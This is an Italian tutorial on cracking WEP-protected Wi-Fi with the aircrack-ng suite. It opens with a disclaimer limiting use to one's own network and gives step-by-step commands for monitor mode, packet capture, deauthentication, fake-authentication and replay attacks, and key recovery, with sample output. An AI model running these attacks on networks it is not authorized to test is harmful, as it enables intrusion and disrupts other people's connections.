Questa guida è solo a scopo dimostrativo: se volete fare il cracking di una rete wifi protetta fatelo sulla vostra in quanto la legge vieta espressamente la forzatura di sistemi altrui, comprese le reti.
Le informazioni di seguito riportate sono prese da “http://www.aircrack-ng.org/doku.php” e testate su SUSE 10.1 e Knoppix 5.0.1 utilizzando un Asus Centrino, un Macbook 2.16 ed un modem Alice gate2 Plus Wi-Fi.
Introduzione
Aircrack è una suite composta da diversi tools:
“Airodump” per la cattura di pacchetti 802.11 (sniffer)
“Aireplay” per il packet injection
“Aircrack” per il cracking di chiavi WEP e WPA-PSK
“Airdecap” decifra file catturati WEP/WPA
Nozioni di Base
I partecipanti:
• Access Point (AP) : è l’access point di cui vogliamo conoscere la chiave
• Target Client (TC) : è il computer che dialoga con l’access point.
• Sniffing Client (SC) : è il computer che si occuperà di sniffare il traffico della rete (passive mode).
• Attacking Client (AC) : è un client che si occuperà di stimolare la generazione di idonei pacchetti (IVs) (active mode)
Installazione
Per prima cosa installiamo aircrack
apriamo una shell e da amministratori digitiamo:
Make
Make install
e lavoriamo nella relativa cartella.
Configurazione
Digitiamo
iwconfig
e vediamo quale interfaccia stiamo usando (nel mio caso eth2).
Avviamo Airmon-ng:
airmon-ng <start|stop> <interface> [channel]
dove
·<start|stop> avvia o ferma l’interfaccia
·<interface> specifica l’interfaccia (eth0, wifi0, wlan0)
·[channel] indica il canale (opzionale)
esempio:
arimon-ng start eth2
otteniamo per il mio Asus:
Interface Chipset Driver
eth2 Centrino 2 ipw2200 (monitor mode enable)
Scansione
Lanciamo da terminale il seguente comando per abilitare la modalità monitor della scheda wireless:
iwconfig eth2 mode monitor
poi avviamo lo sniffer:
airodump-ng <options> <interfaccia>
dove:
Options:
–ivs: Save only captured IVs. Short form -i.
–gpsd: Use GPSd.Short forum -g.
–write<prefix> : Dump file prefix.Short form -w.
–beacons: Record all beacons in dump file. Short form -e.
–netmask <netmask> : Filter APs by mask. Short form -m.
–bssid<bssid> : Filter APs by BSSID.Short form -d.
–encrypt<suite> : Filter APs by cypher suite.Short form -t
-a: Filter unassociated clients
Appare ad esempio:
CH9 ][ Elapsed: 1 min ][ 2007-04-26 17:41 ][ WEP handshake: 00:19::3E:48:52:B5
BSSIDPWR RXQBeacons#Data, #/sCHMBENCCIPHER AUTH ESSID
00:19::3E:48:52:B532 100752732954 WEP WEP Alice
BSSIDSTATIONPWRLostPacketsProbes
00:19:3E:48:52:B500:0F:B5:FD:FB:C235099 Alice
Otteniamo le seguenti informazioni:
·BSSID dell’AP (indirizzo MAC)
·ESSID dell’AP (nome della rete)
·Channel (canale)
ed il tipo di chiave, nel nostro caso WEP.
Sniffing
Ora fermiamo arodump (ctrl +C) e lanciamo nuovamente airodump-ng con questi paramentri:
airodump-ng -c <canale> -w <file.cap> <interfaccia>
esempio
“airodump-ng -c 1 -b 00:19:3E:48:52:B5 -w test eth2”
In questo limitiamo la ricerca al solo canale interessato e salviamo le informazioni catturate su un file “test”. Per il crack di una rete abbiamo bisogno dai 50.000 a 1.000.000 ivs circa per una chiave Wep a 128-bit, ci vorrebbero forse mesi, allora dobbiamo stimolare la produzione di IVs con vari tipi di attacco!
I tipi di attacco
·Attack 0: Deauthentication
·Attack 1: Fake authentication
·Attack 2: Interactive packet replay
·Attack 3: ARP request replay attack
·Attack 4: KoreK chopchop attack
·Attack 5: Fragmentation attack
·Attack 9: Injection test
Importante
Non tutte le schede Wireless hanno drivers che consentono l’injection.
Airplay-ng supporta l’injection solo su schede Prism2, PrismGT. Atheros, RTL8180/8187, Ralink, Zydas
nel mio caso la scheda interna è del tipo “ipw2200”, pertanto cerco l’ultimo pacht/driver disponibile.
Recupero i driver e li installo:
wget http://superb-west.dl.sourceforge.net/sourceforge/
ieee80211/ieee80211-1.2.17.tar.gz
tar zxvf ieee80211-1.2.17.tar.gz
cd ieee80211-1.2.17
make
make install
modprobe ipw2200 rtap_iface=1
ifconfig rtap0 up
fconfig eth2 up
(i driver ipw2200 per jniect funzionano solo per attacchi 2 e 4 , forse il 3, certamente chi possiede un centrino con la scheda ipw3945 può effettuare l’ jniection installando:
wget http://homepages.tu-darmstadt.de/~p_larbig/
wlan/ipwraw-ng-2.0.0-10072007.tar.bz2
tar -xjf ipwraw-ng*
…install….eccc…
sudo modprobe -r ipw3945sudo modprobe ipwraw
)
Esempi di attacco:
0. Deauthentication
aireplay-ng -0 1 -a 00:19:3E:48:52:B5 -c 00:1B:63:08:B6:40 eth2
1. Fake authentication
aireplay-ng -1 0 -e <ESSID> -a <BSSID> -h <MAC TC> <interfaccia>
aireplay-ng -1 6000 -o 1 -q 10 -e Alice -a 00:19:3E:48:52:B5 -h 00:1B:63:08:B6:40 eth2
altro esempio:
“aireplay-ng -1 0 -e Alice-xxxxx -a 00:19:3e:48:52:b5 -h 00:1b:63:08:b6:40 eth2”
dove:
·-1 = fake authentication
·-o il ritardo (valore >=0)
·-e “Alice-xxxxx” è il nome del network
·-a 00:19:3e:48:52:b5 è l’ind. MAC dell’AP
·-h 00:1b:63:08:b6:40 è l’ind. MAC del TC
·eth2 è il nome dell’interfaccia
2. Interactive packet replay
aireplay-ng -2 -b 00:19:3E:48:52:B5 -d FF:FF:FF:FF:FF:FF -t 1 eth2
3. ARP Request Replay Attack
aireplay-ng -3 -b <BSSID> – h <AP client> <interface>
aireplay-ng -3 -b <BSSID> – d <MAC di destinazione (falso)> -h <MAC TC> <interface>
aireplay-ng -3 -b 00:19:3E:48:52:B5 -h 00:1B:63:08:B6:40 eth2
4. KoreK chopchop
aireplay-ng -4 -b 00:19:3E:48:52:B5 -h 00:1B:63:08:B6:40 eth2
5. Fragmentation Attack
aireplay-ng -5 -b 00:19:3E:48:52:B5 -h 00:1B:63:08:B6:40 eth2
6. Injection test
aireplay-ng –test <interfaccia>
aireplay-ng -9 eth2
aireplay-ng –test -e Alice -a 00:19:3E:48:52:B5 eth2
Cracking
Quando siamo pronti (numero di IVs ottimale raggiunto) digitiamo da un’altra shell:
aircrack-ng <options> <file.cap>
o
aircrack-ng -a 1 – b <mac AP> -n XX nomefile.cap
nel nostro caso:
aircrack-ng -n 64 test-01.cap
o
aircrack-ng -a 1 – b 00:19:3e:48:52:b5 -n 64 test.cap
o
aircrack-ng -f 2 – b 00:19:3e:48:52:b5 -n 64 test.cap
tra le opzioni segnalo:
-n : lunghezza della chiave,
– 64 per 40-bit WEP
– 128 per 104-bit WEP
-a : force attack mode (1=static WEP, 2=WPA/WPA2-PSK)
-b : indirizza il targhet network sull’indirizzo MAC dell’access point)
– f: (2 per 104-bit WEP ; 5 per 40-bit WEP)
un pò di pazienza e se i pacchetti IVs sono sufficienti si ottiene la chiave.
Opening ptw-01.cap
Read 171721 packets.
#BSSIDESSIDEncryption
100:19::3E:48:52:B5 Alice-xxxxxWEP (30680 IVs)
Choosing first network as target.
Aircrack-ng 0.7 r247
[00:00:00] Tested 2 keys (got 13 IVs)
KBdepthbyte(vote)
00/000(0) 00(0) 00(0) 00(0) 00(0) 00(0) 00(0) 00(0) 00 ( 0) 00(0)
KEY FOUND! [ 12:34:56:78:90 ]
Probability: 100%
ed il gioco è fatto.
Se la vostra scheda non supporta l’injection, e volete ugualmente testare aircrack potete usare il seguente file:
relativo ad una chiave a 128-bit WEP, una volta decriptato apparirà il seguente valore:
“1F:1F:1F:1F:1F ”
difatti ricordo che:
WEP – lunghezza chiave Caratteri Ascii Caratteri Hex.
64 bits 5 10
128 bits 13 26
256 bits 29 58
Buon lavoro
Lascia un commento
Devi essere connesso per inviare un commento.